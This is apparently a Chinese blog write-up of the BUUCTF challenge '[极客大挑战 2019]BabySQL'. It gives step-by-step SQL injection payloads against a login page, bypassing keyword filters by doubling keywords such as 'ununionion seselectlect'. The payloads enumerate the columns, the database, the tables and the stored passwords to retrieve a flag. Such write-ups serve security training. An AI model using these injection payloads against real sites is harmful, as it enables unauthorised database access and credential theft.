web:[极客大挑战 2019]BabySQL

题目

web:[极客大挑战 2019]BabySQL_第1张图片

点进页面显示如下

web:[极客大挑战 2019]BabySQL_第2张图片

查看源代码

web:[极客大挑战 2019]BabySQL_第3张图片

先尝试一下万能密码

web:[极客大挑战 2019]BabySQL_第4张图片

没用,or被过滤了

web:[极客大挑战 2019]BabySQL_第5张图片

试着双写看看

web:[极客大挑战 2019]BabySQL_第6张图片

回显一串,也不是flag

web:[极客大挑战 2019]BabySQL_第7张图片

先查询列数尝试一下,把union select过滤了,使用双写

web:[极客大挑战 2019]BabySQL_第8张图片

构造payload

/check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23

web:[极客大挑战 2019]BabySQL_第9张图片

显示列数不对,往上加,加到3

(tips:因为要回显,所以需要设一个不是数据里面的用户,直接改成amdin1,回显字段为2和3)

web:[极客大挑战 2019]BabySQL_第10张图片

成功

先查询数据库

构造payload

/check.php?username=admin&password=1 %27 ununionion seselectlect 1,2,database() %23

得到数据库geek

web:[极客大挑战 2019]BabySQL_第11张图片

查询表

/check.php?username=admin&password=11' uunionnion sselectelect 1,(sselectelect group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema='geek'),3 %23
// 出现重写的都是被过滤的

web:[极客大挑战 2019]BabySQL_第12张图片

有两个表,查询表中字段

/check.php?username=admin&password=1' uunionnion sselectelect 1,(sselectelect group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema='geek'),(sselectelect group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql')%23

得到三个字段

web:[极客大挑战 2019]BabySQL_第13张图片

查询字段中的数据

/check.php?username=admin&password=1' uunionnion sselectelect 1,(sselectelect group_concat(passwoorrd) ffromrom b4bsql),(sselectelect group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql')%23

web:[极客大挑战 2019]BabySQL_第14张图片

查看源代码可得到flag

web:[极客大挑战 2019]BabySQL_第15张图片

总结

考查重写绕过

你可能感兴趣的:(BUUCTF-WEB,网络安全,web安全)